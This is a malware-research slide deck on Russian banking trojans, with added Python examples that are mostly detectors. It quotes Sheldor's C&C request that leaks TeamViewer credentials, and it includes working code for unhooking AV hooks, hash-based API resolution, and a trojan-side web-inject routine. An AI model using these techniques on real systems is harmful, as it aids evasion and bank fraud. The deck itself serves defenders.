2. Who we are
Malware researchers at ESET
- analysis of complex threats
- development of cleaning tools
- tracking new malware techniques
- investigation of cybercrime groups
http://www.joineset.com/
3. Agenda
o Cybercrime trends in RBS (remote banking systems)
o Most prevalent threats and incidents
Win32/Shiz
Win32/Hodprot
Win32/Sheldor
Win32/RDPdoor
Win32/Carberp
o Carberp cybercrime group revenue
4. Overview
2010/11: years of attacks on Russian banks
• number of incidents has more than doubled compared to 2010*
• over 92%* of incidents involve banking trojans
• malware tailored to Russian banks and payment systems
However!
• can be (and is) used in other countries as well
*research report "The Russian cybercrime market in 2010: status and trends"
http://www.group-ib.ru/wp-content/uploads/2011/04/Group-IB_Report_Russian-cybercrime-market_2010_eng.pdf
23. Win32/Hodprot: C&C protocol
Participants: Win32/Hodprot bot, C&C server
1. Bot sends a request to the C&C (bot ID, integer)
2. C&C handles the request and replies with updated modules and an image to execute
3. Bot updates its modules and runs the downloaded executable
4. Bot sends status information to the C&C
25. Win32/Sheldor and TeamViewer in action
Participants: infected computer (Win32/Sheldor), TeamViewer cloud, C&C
1. Infected computer requests a cloud ID from the TeamViewer cloud
2. TeamViewer cloud sets the cloud ID
3. Sheldor sends the ID to the C&C:
GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1
4. Malicious connection to the infected computer through the TeamViewer cloud
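The check-in in step 3 is the one artifact a network defender can hunt for. The block below is an added example, not code from the ESET slides: it scans proxy log lines for the /getinfo.php beacon, verifies that the id is shaped like a nine-digit TeamViewer ID, and extracts the ID and session password. Only the request shape comes from the slide; the log format, the C&C host, client addresses and timestamps are constructed.

```python
"""Hunt for Win32/Sheldor-style TeamViewer ID exfiltration in web proxy logs.

Added example; not code from the ESET slides. The log lines below are constructed.
Only the request shape (/getinfo.php?id=<TeamViewer ID>&pwd=<session password>&stat=1)
comes from slide 25; the host name, client addresses and timestamps are made up.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Common Log Format: client ident user [time] "METHOD url HTTP/x.y" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# TeamViewer IDs are nine digits, usually shown in three groups ("414 034 883");
# the bot URL-encodes the spaces as %20, which parse_qs decodes back for us.
TV_ID_RE = re.compile(r'^\d{3} ?\d{3} ?\d{3}$')


def parse_beacon(url):
    """Return the leaked credentials if url looks like a Sheldor check-in, else None."""
    parts = urlsplit(url)  # works for both "/getinfo.php?..." and full proxy-log URLs
    if not parts.path.endswith('/getinfo.php'):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if 'id' not in qs or 'pwd' not in qs:
        return None
    tv_id = qs['id'][0]
    if not TV_ID_RE.match(tv_id):
        return None  # some unrelated getinfo.php; the id is not TeamViewer-shaped
    return {
        'teamviewer_id': tv_id.replace(' ', ''),
        'password': qs['pwd'][0],
        'stat': qs.get('stat', [''])[0],
        'host': parts.netloc,
    }


def scan_log(lines):
    """Return one alert per log line that carries a Sheldor beacon."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        beacon = parse_beacon(m.group('url'))
        if beacon:
            beacon['client'] = m.group('client')
            alerts.append(beacon)
    return alerts


# Constructed proxy log: one beacon (TEST-NET address as the C&C), one normal request,
# one unrelated getinfo.php that must not fire.
SAMPLE_LOG = [
    '10.0.0.17 - - [21/Nov/2011:10:12:01 +0300] "GET http://203.0.113.5/getinfo.php?id=414%20034%20883&pwd=6655&stat=1 HTTP/1.1" 200 14',
    '10.0.0.17 - - [21/Nov/2011:10:12:03 +0300] "GET http://www.example.com/index.html HTTP/1.1" 200 5120',
    '10.0.0.22 - - [21/Nov/2011:10:13:40 +0300] "GET http://shop.example.net/getinfo.php?id=12345&pwd=x HTTP/1.1" 200 77',
]

if __name__ == '__main__':
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['client']} leaked TeamViewer ID {a['teamviewer_id']} / password {a['password']} to {a['host']}")
```

An alert here means more than "infected": whoever holds the ID and password can connect through the legitimate TeamViewer cloud, so the host has to be treated as remotely controlled, and the TeamViewer install itself as untrusted (see the proxy DLL on the next slide).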
26. Under the hood: DLL hooking
TeamViewer.exe loads TV.dll (proxy DLL), which forwards to TS.dll (original DLL)
30. Win32/RDPdoor installation
Participants: infected computer, Win32/RDPdoor C&C
1. Run the dropper and send system information to the C&C
2. Authentication on the C&C; the C&C provides Thinsoft BeTwin for installation
3. Send status information to the C&C
31. Stealing authentication data
1. Install GINA extension DLL
2. Display fake logon screen
3. Capture user name & password
4. Send to C&C
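A GINA extension of this kind only gets to draw its fake logon screen if Winlogon is told to load it, and that is a single registry value. The block below is an added example, not from the slides: it parses an exported Winlogon key and flags a GinaDLL that is not msgina.dll, or an msgina.dll loaded from outside System32. The value name GinaDLL and the default msgina.dll are Windows facts; the .reg text is constructed and the file name ginaext.dll is made up.

```python
"""Check an exported Winlogon key for a replaced GINA (the hook slide 31 describes).

Added example, not from the slides. The .reg text is constructed; on a live host the input
comes from:  reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" winlogon.reg
The value name GinaDLL and the default msgina.dll are Windows facts; 'ginaext.dll' is made up.
"""
WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
DEFAULT_GINA = "msgina.dll"


def parse_reg(text):
    """Parse .reg export text into {key: {value_name: data}}; enough for string values."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and '=' in line:
            name, _, data = line.partition('=')
            name = name.strip('"')
            if data.startswith('"') and data.endswith('"'):
                data = data[1:-1].replace('\\\\', '\\')  # .reg doubles backslashes
            keys[current][name] = data
    return keys


def check_gina(reg_text):
    """Return ('clean' | 'suspicious', detail) for the GinaDLL setting."""
    winlogon = parse_reg(reg_text).get(WINLOGON_KEY, {})
    gina = winlogon.get('GinaDLL')
    if gina is None:
        return ('clean', 'GinaDLL not set; Winlogon loads the built-in msgina.dll')
    filename = gina.rsplit('\\', 1)[-1].lower()
    if filename != DEFAULT_GINA:
        # A GINA stealer registers its own DLL here and forwards the Wlx* calls to
        # msgina.dll, so logon keeps working while the fake screen harvests credentials.
        return ('suspicious', f'GinaDLL replaced: {gina}')
    if '\\' in gina and 'system32' not in gina.lower():
        return ('suspicious', f'msgina.dll loaded from an unexpected path: {gina}')
    return ('clean', f'GinaDLL={gina}')


# Constructed export of a clean Winlogon key
CLEAN_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe"
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,"
'''

# Same key with a made-up GINA extension registered (file name is fictional)
INFECTED_REG = CLEAN_REG + '"GinaDLL"="C:\\\\WINDOWS\\\\system32\\\\ginaext.dll"\n'

if __name__ == '__main__':
    print(check_gina(CLEAN_REG))
    print(check_gina(INFECTED_REG))
```

GINA exists on Windows 2000, XP and Server 2003 only; Vista and later replaced it with Credential Providers, so this check applies to hosts of that generation. A clean result still says nothing about the DLL's contents: confirm that the registered file is the genuine msgina.dll (signature, hash) rather than a same-named copy.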
35. Self-protecting functionality
Technique: implementation
Bypassing AV emulators: many calls of rare WinAPI functions
Code injection method: ZwQueueApcThread(), ZwResumeThread()
Unhooking method: checking the first bytes of the API function body and deleting hooks
Command and string encryption: custom encryption algorithm
Bot authentication on C&C: file with authentication data stored on the infected PC
Network communication encryption: base64(RC2(data))
API function call obfuscation: custom hash algorithm
Detection of AV hooks: comparison of the first original bytes
Bypassing static AV signatures: appending random junk bytes to dropped files
Hiding in the system: hooking system functions; bootkit infector (September 2011)
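Two rows of the table, the check of the first bytes of an API function and the hash-based API resolution, are simple enough to show in code. The block below is an added example, not Carberp's code: it classifies the common 5- and 6-byte inline-hook stubs found at a function start, restores the original bytes (the "deleting hooks" step), and resolves an export by a ROR-13 name hash. The slide does not give Carberp's hash algorithm or the hook patterns it looks for; the forms below are the textbook ones, and the prologue bytes are constructed.

```python
"""Spot and remove inline hooks on an API prologue, and resolve an API by name hash.

Added example, not Carberp's code. The slide only says the bot compares the first bytes of
an API function with the original ones and removes hooks, and resolves APIs through a
custom hash; the stub patterns and the ROR-13 hash are the common textbook forms, assumed
for illustration. Everything runs on byte strings, so it works off-line; in a live process
the 'current' bytes are read from the loaded DLL and the 'original' ones from the clean
file on disk.
"""
import struct

# Constructed stand-in for the clean start of a 32-bit API stub:
#   mov edi,edi ; push ebp ; mov ebp,esp ; push 0 ; mov eax,[ebp+8]
ORIGINAL = bytes.fromhex('8bff558bec6a008b4508')


def classify_hook(current, original):
    """None if the first len(original) bytes are intact, else (kind, target) for the patch.

    target is an offset from the function start for relative jumps/calls, an absolute
    address for jmp [mem32] and push/ret, None when the patch is not a recognised stub.
    """
    if current[:len(original)] == original:
        return None
    b = current
    if b[0] == 0xE9 and len(b) >= 5:                   # jmp rel32
        return ('jmp rel32', 5 + struct.unpack('<i', b[1:5])[0])
    if b[:2] == b'\xff\x25' and len(b) >= 6:           # jmp dword ptr [abs32]
        return ('jmp [mem32]', struct.unpack('<I', b[2:6])[0])
    if b[0] == 0x68 and len(b) >= 6 and b[5] == 0xC3:  # push imm32 ; ret
        return ('push/ret', struct.unpack('<I', b[1:5])[0])
    if b[0] == 0xE8 and len(b) >= 5:                   # call rel32
        return ('call rel32', 5 + struct.unpack('<i', b[1:5])[0])
    return ('unknown patch', None)


def unhook(current, original):
    """Write the original bytes back over the patched prologue.

    `original` must span at least the longest stub expected (6 bytes for push/ret);
    restoring fewer bytes leaves part of the stub, e.g. a dangling ret, in place.
    """
    return original + current[len(original):]


def ror13_hash(name):
    """Illustrative API-name hash (ROR-13 over the ASCII name); not Carberp's own algorithm."""
    h = 0
    for ch in name.encode('ascii'):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + ch) & 0xFFFFFFFF
    return h


def resolve_by_hash(export_names, wanted):
    """Find the export whose name hashes to `wanted`: how a bot imports APIs without plaintext names."""
    for name in export_names:
        if ror13_hash(name) == wanted:
            return name
    return None


# Constructed hooked variants of the same function start
HOOKED_JMP = bytes.fromhex('e9fb0f0000') + ORIGINAL[5:]       # jmp to +0x1000 from function start
HOOKED_PUSHRET = bytes.fromhex('6878563412c3') + ORIGINAL[6:]  # push 0x12345678 ; ret

if __name__ == '__main__':
    print(classify_hook(ORIGINAL, ORIGINAL))            # None: intact
    print(classify_hook(HOOKED_JMP, ORIGINAL))          # ('jmp rel32', 4096)
    print(classify_hook(HOOKED_PUSHRET, ORIGINAL))      # ('push/ret', 305419896)
    print(unhook(HOOKED_JMP, ORIGINAL) == ORIGINAL)     # True
    exports = ['ZwQueueApcThread', 'ZwResumeThread', 'CreateFileA']
    print(resolve_by_hash(exports, ror13_hash('ZwResumeThread')))
```

Both sides use the same comparison: the bot strips AV hooks before calling the API, and a scanner detects the bot's own hooks (the "hooking system functions" row) by comparing the loaded image with the file on disk. Remember that the bot reads the reference bytes from a file it can also tamper with, and that a hash-resolved import table leaves no API names for static signatures, which is why the hash algorithm itself becomes a detection artifact.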
38. Carberp going deeper since September 2011
Boot sequence and where the bootkit sits:
1. Load MBR (real mode)
2. Load VBR (real mode)
3. Load bootstrap code (real mode): target of Rovnix & Carberp
4. Load bootmgr (switches from real mode to protected mode)
5. Load winload.exe or winresume.exe (protected mode)
6. Load kernel and boot-start drivers (protected mode)
39. Carberp: Infected Partition Layout
o Carberp overwrites the bootstrap code of the active partition (NTFS bootstrap code, 15 sectors following the VBR)
o The malicious driver is written either:
  - before the active partition, in case there is enough space
  - at the end of the hard drive, otherwise
Before infecting: MBR | VBR | bootstrap code | file system data
After infecting: MBR | VBR | malicious bootstrap code | compressed data | file system data | malicious unsigned driver
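The layout above can be verified from a raw disk image without booting the system. The block below is an added example, not ESET's tool: it builds a small constructed MBR image with one active NTFS partition, infects it the way the slide describes (15 bootstrap sectors replaced, a driver parked before the active partition if there is room, otherwise at the end of the disk), then checks the two traces: a VBR+bootstrap hash that no longer matches a known-good value, and non-zero sectors in unpartitioned space. The stand-in bootstrap and driver bytes are constructed, and the known-good hash is taken from the clean image.

```python
"""Check an MBR disk image for the two traces of the layout on slide 39: modified
bootstrap code behind the active partition's VBR, and an unsigned driver parked in
unpartitioned space (before the active partition, or at the end of the disk).

Added example, not from the ESET slides. The disk image is constructed in memory:
512-byte sectors, one active NTFS partition, deterministic stand-in bytes for the
bootstrap code and the driver. On a real disk the reference hash comes from a known-clean
image of the same Windows build.
"""
import hashlib
import struct

SECTOR = 512
BOOTSTRAP_SECTORS = 15   # NTFS bootstrap code (IPL) following the VBR


def partitions(img):
    """Yield (active, type, start_lba, sector_count) for the populated MBR entries."""
    if bytes(img[510:512]) != b'\x55\xaa':
        raise ValueError('no MBR signature')
    for i in range(4):
        status, ptype, start, count = struct.unpack_from('<B3xB3xII', img, 446 + 16 * i)
        if ptype:
            yield status == 0x80, ptype, start, count


def active_partition(img):
    for active, _, start, count in partitions(img):
        if active:
            return start, count
    raise ValueError('no active partition')


def sectors(img, lba, n=1):
    return bytes(img[lba * SECTOR:(lba + n) * SECTOR])


def boot_code_hash(img, start):
    """SHA-256 over the VBR plus the 15 bootstrap sectors of the partition at start."""
    return hashlib.sha256(sectors(img, start, 1 + BOOTSTRAP_SECTORS)).hexdigest()


def nonzero_runs(img, first, last):
    """Contiguous runs of non-zero sectors in [first, last) as (start_lba, count)."""
    runs, run_start = [], None
    for lba in range(first, last):
        used = any(sectors(img, lba))
        if used and run_start is None:
            run_start = lba
        elif not used and run_start is not None:
            runs.append((run_start, lba - run_start))
            run_start = None
    if run_start is not None:
        runs.append((run_start, last - run_start))
    return runs


def analyze(img, known_good_hash):
    start, _ = active_partition(img)
    total = len(img) // SECTOR
    last_end = max(s + c for _, _, s, c in partitions(img))
    return {
        'bootstrap_modified': boot_code_hash(img, start) != known_good_hash,
        'hidden_before_partition': nonzero_runs(img, 1, start),      # gap between MBR and active partition
        'hidden_after_partitions': nonzero_runs(img, last_end, total),  # unpartitioned tail of the disk
    }


def build_clean_image(total_sectors=4096, start=2048, count=1024):
    """One active NTFS (type 0x07) partition; VBR and IPL filled with deterministic stand-in bytes."""
    img = bytearray(total_sectors * SECTOR)
    struct.pack_into('<B3xB3xII', img, 446, 0x80, 0x07, start, count)
    img[510:512] = b'\x55\xaa'
    vbr = bytearray(SECTOR)
    vbr[3:11] = b'NTFS    '
    vbr[510:512] = b'\x55\xaa'
    img[start * SECTOR:(start + 1) * SECTOR] = vbr
    for i in range(BOOTSTRAP_SECTORS):
        img[(start + 1 + i) * SECTOR:(start + 2 + i) * SECTOR] = hashlib.sha256(b'ipl%d' % i).digest() * 16
    return img


def infect(img, driver_sectors=64):
    """Mimic the slide: replace the 15 IPL sectors; park the driver before the partition if it fits, else at the end."""
    img = bytearray(img)
    start, _ = active_partition(img)
    for i in range(BOOTSTRAP_SECTORS):
        img[(start + 1 + i) * SECTOR:(start + 2 + i) * SECTOR] = hashlib.sha256(b'evil%d' % i).digest() * 16
    total = len(img) // SECTOR
    lba = start - driver_sectors if start - 1 >= driver_sectors else total - driver_sectors
    img[lba * SECTOR:(lba + driver_sectors) * SECTOR] = hashlib.sha256(b'driver').digest() * (16 * driver_sectors)
    return img


if __name__ == '__main__':
    clean = build_clean_image()
    baseline = boot_code_hash(clean, 2048)
    print(analyze(clean, baseline))
    print(analyze(infect(clean), baseline))                          # driver lands at LBA 1984
    print(analyze(infect(build_clean_image(start=32)), baseline))   # no room before: driver at the end
```

Non-zero slack on its own is a lead, not a verdict (boot loaders and OEM tools also live in the gap before the first partition); the combination with a changed bootstrap hash is what points at the bootkit. Read through the running system's own disk handle the result can be lied to by the bootkit's hooks, so image the disk offline or from another OS.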
43. Win32/Carberp: money stealing methods
Stealing technique: functionality
Web-injects/Autoloads (IE, FF, Chrome, Opera): inserting the specified JS code into the HTML returned by the online banking site
Backconnect backdoor (RDP/VNC): loading a special binary module on request (RDPdoor, custom VNC client)
Keylogger (based on WinAPI): recording keyboard events into a log file
ScreenSpy (based on WinAPI): saving screenshots into a log file
Grabbers (Form, FTP, Pass): loading a special binary module on request
Custom plugins for RBS: binary modules for specified RBS (sber.plug)
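The web-inject row is the one method in the table whose mechanics fit in a few lines. The block below is an added example, not Carberp's code or its configuration format: a rule (URL glob, HTML marker, payload) is applied to the page the browser is about to render, and a defender-side check compares the SHA-256 of every inline script against the set computed from the genuine page. The rule format is an assumption for illustration; the bank URL, page and payload are constructed.

```python
"""Web-inject mechanics from slide 43, and an integrity check that catches the result.

Added example, not Carberp's code or config format. The rule format (URL glob, marker,
payload) is an assumption for illustration; the bank page, URL and payload are constructed.
"""
import hashlib
import re
from fnmatch import fnmatch

# Constructed rule: on the login page, drop a script right after the login form opens.
INJECT_RULES = [
    {
        'url': '*bank.example/login*',
        'after': '<form id="login"',
        'inject': '<script>/* constructed stand-in for the fraud script */'
                  'document.forms[0].addEventListener("submit", function () {});</script>',
    },
]


def apply_web_injects(url, html, rules=INJECT_RULES):
    """Trojan side: insert each matching rule's payload into the HTML the browser is about to render."""
    for rule in rules:
        if not fnmatch(url, rule['url']):
            continue
        idx = html.find(rule['after'])
        if idx == -1:
            continue                      # marker missing (site changed); the bot just skips the rule
        end = html.find('>', idx) + 1     # finish the tag that contains the marker
        html = html[:end] + rule['inject'] + html[end:]
    return html


SCRIPT_RE = re.compile(r'<script\b[^>]*>(.*?)</script>', re.I | re.S)


def inline_script_hashes(html):
    """SHA-256 of every inline <script> body, the same quantity a CSP 'sha256-...' source pins."""
    return [hashlib.sha256(body.encode()).hexdigest() for body in SCRIPT_RE.findall(html)]


def unexpected_scripts(html, allowlist):
    """Defender side: inline scripts whose hash is not in the set computed from the genuine page."""
    return [h for h in inline_script_hashes(html) if h not in allowlist]


# Constructed genuine login page as served by the bank
SAMPLE_URL = 'https://online.bank.example/login'
SAMPLE_PAGE = (
    '<html><head><script>var csrf="t0k3n";</script></head>'
    '<body><form id="login" action="/auth" method="post">'
    '<input name="user"><input name="pass" type="password"></form></body></html>'
)

if __name__ == '__main__':
    allow = set(inline_script_hashes(SAMPLE_PAGE))
    tampered = apply_web_injects(SAMPLE_URL, SAMPLE_PAGE)
    print(tampered != SAMPLE_PAGE, unexpected_scripts(tampered, allow))
```

The injection happens inside the browser after TLS has been stripped, so the bank's server never sees the altered page and TLS gives the customer no protection here. A strict Content-Security-Policy with script hashes would make the browser refuse the injected inline script, but only if the trojan does not also rewrite the response headers, which a web-inject engine that already hooks the browser's network functions is in a position to do; the hash comparison above therefore belongs in an endpoint agent or an out-of-band comparison of the rendered page against the served one, not in the page itself.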
52. References
“Cybercrime in Russia: Trends and issues”
http://go.eset.com/us/resources/white-papers/CARO_2011.pdf
“Evolution of Win32/Carberp: going deeper”
http://blog.eset.com/2011/11/21/evolution-of-win32carberp-going-deeper
“Hodprot: Hot to Bot”
http://go.eset.com/us/resources/white-papers/Hodprot-Report.pdf
Follow ESET Threat Blog
http://blog.eset.com